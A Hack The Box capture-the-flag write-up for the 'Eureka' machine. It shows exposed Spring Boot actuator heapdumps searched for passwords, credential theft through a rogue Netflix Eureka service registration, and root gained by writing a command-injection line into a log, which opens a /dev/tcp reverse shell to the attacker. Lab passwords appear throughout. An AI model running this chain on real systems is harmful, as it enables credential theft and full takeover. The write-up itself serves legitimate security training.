⚜️Eureka

https://app.hackthebox.com/machines/Eureka

Recon

nmap -sCV -T4 <ip> -oA <file>

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Adding new hosts

etc/hosts entry

10.129.242.192 eureka.htb furni.htb

Furni-Website

➜  eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50                                                                                                                                                                             
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html                                                           
  from pkg_resources import DistributionNotFound, VersionConflict                                                                                                                                                                          
                                                                                                                                                                                                                                           
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                    
                                                                                                                                                                                                                                           
Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordlist size: 10403                                                                                                                                                         
                                                                                                                                                                                                                                           
Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_furni.htb/__25-04-27_22-17-19.txt                                                                                                                                      
                                                                                                                     
Target: http://furni.htb/                                                                                            
                                                                                                                     
[22:17:19] Starting:                       
[...]
[22:17:27] 200 -    2KB - /actuator                        
[22:17:27] 400 -  105B  - /actuator/;/sso                  
[22:17:27] 400 -  115B  - /actuator/;/springWebflow
[22:17:27] 400 -  112B  - /actuator/;/statistics
[22:17:27] 400 -  113B  - /actuator/;/ssoSessions
[22:17:27] 400 -  108B  - /actuator/;/status
[22:17:27] 400 -  112B  - /actuator/;/threaddump
[22:17:27] 400 -  107B  - /actuator/;/trace
[22:17:27] 200 -   20B  - /actuator/caches                 
[22:17:27] 200 -    6KB - /actuator/env                    
[22:17:27] 200 -    2B  - /actuator/info                   
[22:17:27] 200 -  467B  - /actuator/features
[22:17:27] 200 -   76MB - /actuator/heapdump
[22:17:27] 200 -    3KB - /actuator/metrics                
[22:17:27] 200 -   54B  - /actuator/scheduledtasks
[22:17:28] 200 -  198KB - /actuator/beans                  
[22:17:28] 400 -  108B  - /actuator/sessions               
[22:17:28] 405 -  114B  - /actuator/refresh                
[22:17:28] 200 -   96KB - /actuator/loggers                
[22:17:29] 200 -   15B  - /actuator/health                 
[22:17:29] 200 -   35KB - /actuator/mappings               
[22:17:29] 200 -  180KB - /actuator/conditions             
[22:17:29] 400 -  106B  - /admin/%3bindex/
[22:17:30] 200 -  824KB - /actuator/threaddump             
[22:17:30] 400 -   98B  - /admin;/                         
[22:17:31] 400 -   98B  - /Admin;/                         
[22:17:31] 200 -   36KB - /actuator/configprops     
[...]

Leaking information because of misconfigured Spring Boot Acutators http://furni.htb/actuator/env

Checking a common entry points list

/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdown

We find a heapdump at http://furni.htb/actuator/heapdump

Using a script with the help of chat-gpt we find a password:

  GNU nano 8.3                                                                                                   head-search.sh                                                                                                            
#!/bin/bash

# Usage check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <heapdump-file>"
    exit 1
fi

HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"

# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "[*] Extracting and searching in $HEAPDUMP..."
echo "" > "$OUTPUT"

# Search for sensitive patterns
strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+|pwd[ =:][^[:space:]]+|secret[ =:][^[:space:]]+|token[ =:][^[:space:]]+|key[ =:][^[:space:]]+|credential[ =:][^[:space:]]+|auth[ =:][^[:space:]]+|sess>

echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential sensitive items."
echo

# Pretty print
while IFS= read -r line; do
    if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
        echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|auth\|session'; then
        echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then
        echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then
        echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
        echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
    else
        echo -e "${YELLOW}[OTHER]${NC} $line"
    fi
done < "$OUTPUT"

echo
echo "[*] Full results also saved in: $OUTPUT"

[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,    
[..]

User

➜  eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 27 Apr 2025 09:00:04 PM UTC

  System load:           0.0
  Usage of /:            63.8% of 6.79GB
  Memory usage:          47%
  Swap usage:            0%
  Processes:             244
  Users logged in:       0
  IPv4 address for eth0: 10.129.182.126
  IPv6 address for eth0: dead:beef::250:56ff:fe94:4834


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71
oscar190@eureka:~$

We find another password in the application.yml of the eureka-server

oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password|secret|api[_-]?key|token' ./target/classes/application.yaml 
    name: "Eureka Server"

  security:
    user:
      name: EurekaSrvr
      password: 0scarPWDisTheB3st

server:
  port: 8761
  address: 0.0.0.0

nmap-full-scan

The full scan shows the other http-server eureka on port 8761 or like seen in the command above

Eureka-Server

Using these credentials we can login

Create new fake service using this Hacking Netlix Eureka as example

Change YOURIP

curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",  
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

After some time we get the User and Password on our listener

➜  eureka rlwrap nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=BDpsWbgK9mVLFJVx5FuxOvZT2DfbiKCuM7CjmcVRPi8gMtPBNwpbOoBrwwRmJfBBhnaFA8My9VbqvJKDAoKUoadmD04YULD3ls

Change the coding using cyberchef we get the user-flag

➜  eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 10 Apr 2025 07:41:57 AM UTC

  System load:           0.04
  Usage of /:            84.1% of 8.02GB
  Memory usage:          44%
  Swap usage:            0%
  Processes:             248
  Users logged in:       1
  IPv4 address for eth0: 10.129.232.19
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f97


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71
miranda-wise@eureka:~$

Root

Checking for procs running with root privs show us a log_analyse.sh

ps -eo user,pid,comm | grep '^root'
[..]
root     4105259 log_analyse.sh
root     4105350 log_analyse.sh

Searching for log_analyse.sh

miranda-wise@eureka:/$ find . -name log_analyse.sh                                                                                                                                                                                         
find: ‘./boot/lost+found’: Permission denied                                                                                                                                                                                               
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh

In that file at analyze_http_statuses() we can

code=$(echo "$line" | grep -oP 'Status: \K.*')

miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log

➜  eureka rlwrap nc -nlvp 1337                                                                                       │➜  eureka ssh miranda.wise@furni.htb
listening on [any] 1337 ...                                                                                          │miranda.wise@furni.htb's password: 
                                                                                                                     │Permission denied, please try again.
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958                                                        │miranda.wise@furni.htb's password: 
bash: cannot set terminal process group (1726439): Inappropriate ioctl for device                                    │
bash: no job control in this shell                                                                                   │➜  eureka 
root@eureka:~#

Last updated 7 months ago